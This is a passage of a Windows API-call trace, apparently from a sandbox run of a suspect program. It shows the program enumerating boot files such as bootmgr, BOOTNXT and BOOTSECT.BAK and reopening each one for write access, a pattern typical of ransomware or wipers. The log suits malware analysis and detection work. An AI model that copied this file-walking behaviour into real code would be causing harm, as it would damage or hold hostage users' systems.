| out: hHeap=0x20000) returned 1 [0071.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.102] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0071.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.103] AreFileApisANSI () returned 1 [0071.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-TW\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-TW\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0071.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0071.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.104] AreFileApisANSI () returned 1 [0071.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0071.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 30 [0071.104] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.104] GetFileType (hFile=0x428) returned 0x1 [0071.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0071.104] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.104] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.104] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.105] CloseHandle (hObject=0x428) returned 1 [0071.105] AreFileApisANSI () returned 1 [0071.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0071.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0071.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 30 [0071.105] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.105] GetLastError () returned 0x5 [0071.105] GetLastError () returned 0x5 [0071.105] SetLastError (dwErrCode=0x5) [0071.105] GetLastError () returned 0x5 [0071.105] SetLastError (dwErrCode=0x5) [0071.105] GetLastError () returned 0x5 [0071.105] SetLastError (dwErrCode=0x5) [0071.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0071.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.105] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ꖘ")) returned 0 [0071.105] FindClose (in: hFindFile=0x78e50 | out: hFindFile=0x78e50) returned 1 [0071.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.106] AreFileApisANSI () returned 1 [0071.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\bootmgr", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\bootmgr", lpUsedDefaultChar=0x0) returned 11 [0071.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0071.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0071.107] AreFileApisANSI () returned 1 [0071.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0071.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x6f5c8 [0071.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f5c8, cchWideChar=11 | out: lpWideCharStr="C:\\bootmgr") returned 11 [0071.107] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0071.108] GetFileType (hFile=0x40c) returned 0x1 [0071.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.109] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.109] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.109] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.109] CloseHandle (hObject=0x40c) returned 1 [0071.109] AreFileApisANSI () returned 1 [0071.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0071.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x6f5c8 [0071.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f5c8, cchWideChar=11 | out: lpWideCharStr="C:\\bootmgr") returned 11 [0071.109] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.110] GetLastError () returned 0x5 [0071.110] GetLastError () returned 0x5 [0071.110] SetLastError (dwErrCode=0x5) [0071.110] GetLastError () returned 0x5 [0071.110] SetLastError (dwErrCode=0x5) [0071.110] GetLastError () returned 0x5 [0071.110] SetLastError (dwErrCode=0x5) [0071.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.110] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0071.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0071.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.110] AreFileApisANSI () returned 1 [0071.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\BOOTNXT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\BOOTNXT", lpUsedDefaultChar=0x0) returned 11 [0071.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0071.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.111] AreFileApisANSI () returned 1 [0071.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0071.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x6f5c8 [0071.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f5c8, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0071.111] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0071.112] GetFileType (hFile=0x40c) returned 0x1 [0071.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.113] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.113] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.113] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.113] CloseHandle (hObject=0x40c) returned 1 [0071.113] AreFileApisANSI () returned 1 [0071.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0071.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x6f5c8 [0071.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f5c8, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0071.113] CreateFileW (lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0071.113] GetFileType (hFile=0x40c) returned 0x1 [0071.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.114] CloseHandle (hObject=0x40c) returned 1 [0071.114] AreFileApisANSI () returned 1 [0071.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x6f5c8 [0071.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x6f5c8, cchWideChar=11 | out: lpWideCharStr="C:\\BOOTNXT") returned 11 [0071.114] GetFileAttributesExW (in: lpFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.114] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.114] RtlAllocateHeap 